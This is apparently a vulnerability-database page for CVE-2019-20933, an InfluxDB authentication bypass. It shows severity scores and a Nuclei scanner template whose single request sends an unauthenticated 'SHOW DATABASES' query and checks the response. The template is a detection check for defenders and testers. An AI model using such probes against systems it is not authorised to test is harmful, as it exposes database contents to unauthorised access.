Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-20933
HistoryAug 23, 2022 - 3:59 a.m.

InfluxDB <1.7.6 - Authentication Bypass

2022-08-2303:59:33
ProjectDiscovery
github.com
5

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.042 Low

EPSS

Percentile

92.2%

InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

id: CVE-2019-20933

info:
  name: InfluxDB <1.7.6 - Authentication Bypass
  author: pussycat0x,c-sh0
  severity: critical
  description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the InfluxDB database.
  remediation: Update Influxdb to version 1.7.6~rc0-1 or higher.
  reference:
    - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
    - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
    - https://github.com/influxdata/influxdb/commit/761b557315ff9c1642cf3b0e5797cd3d983a24c0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-20933
    cwe-id: CWE-287
    epss-score: 0.04913
    epss-percentile: 0.92609
    cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: influxdata
    product: influxdb
    shodan-query: InfluxDB
  tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata

http:
  - method: GET
    path:
      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"results":'
          - '"name":"databases"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b58799e6f8127779c0e815988ea4492ea6d8636cc9b2d9a0c8b6619e4d8d6078022100e896460a50bf9af6cc431831d64f1bdb58867e720e5cf1e203c1ef4431670286:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.042 Low

EPSS

Percentile

92.2%